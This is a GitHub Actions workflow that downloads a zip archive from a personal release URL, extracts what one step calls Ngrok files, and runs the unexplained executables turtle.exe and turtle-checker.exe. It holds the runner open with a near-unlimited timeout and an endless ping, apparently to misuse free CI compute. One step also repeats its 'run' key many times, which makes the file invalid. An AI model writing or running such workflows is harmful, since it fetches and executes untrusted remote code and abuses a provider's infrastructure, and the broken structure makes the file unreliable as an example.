name: RUNNING

on: workflow_dispatch

jobs:
  build:

    runs-on: windows-latest
    timeout-minutes: 9999

    steps:
    - name: checksystem.
      run: systeminfo
    - name: Downloading checker.
      run: Invoke-WebRequest https://github.com/endri12345/wejhs/releases/download/files/files.zip -OutFile files.zip
    - name: Extracting Ngrok Files.  
      run: Expand-Archive files.zip
    - name: jalankan.
      run: .\files\turtle.exe
    - name: checklokasifile.
      run: ls
    - name: Get-Process.
      run: gps
    - name: ping.
      run: ping 8.8.8.8
      run: ping 8.8.8.8
      run: ping 8.8.8.8
      run: ping 8.8.8.8
      run: ping 8.8.8.8
      run: ping 8.8.8.8
      run: ping 8.8.8.8
      run: ping 8.8.8.8
      run: ping 8.8.8.8
      run: ping 8.8.8.8
      run: ping 8.8.8.8
      run: ping 8.8.8.8
      run: ping 8.8.8.8
      run: ping 8.8.8.8
      run: ping 8.8.8.8
      run: ping 8.8.8.8
      run: ping 8.8.8.8
      run: ping 8.8.8.8
      run: ping 8.8.8.8
      run: ping 8.8.8.8
      run: ping 8.8.8.8
      run: ping 8.8.8.8
      run: ping 8.8.8.8
      run: ping 8.8.8.8
      run: ping 8.8.8.8
    - name: checker.
      run: .\files\turtle-checker.exe
    - name: ping.
      run: ping 8.8.8.8 -t
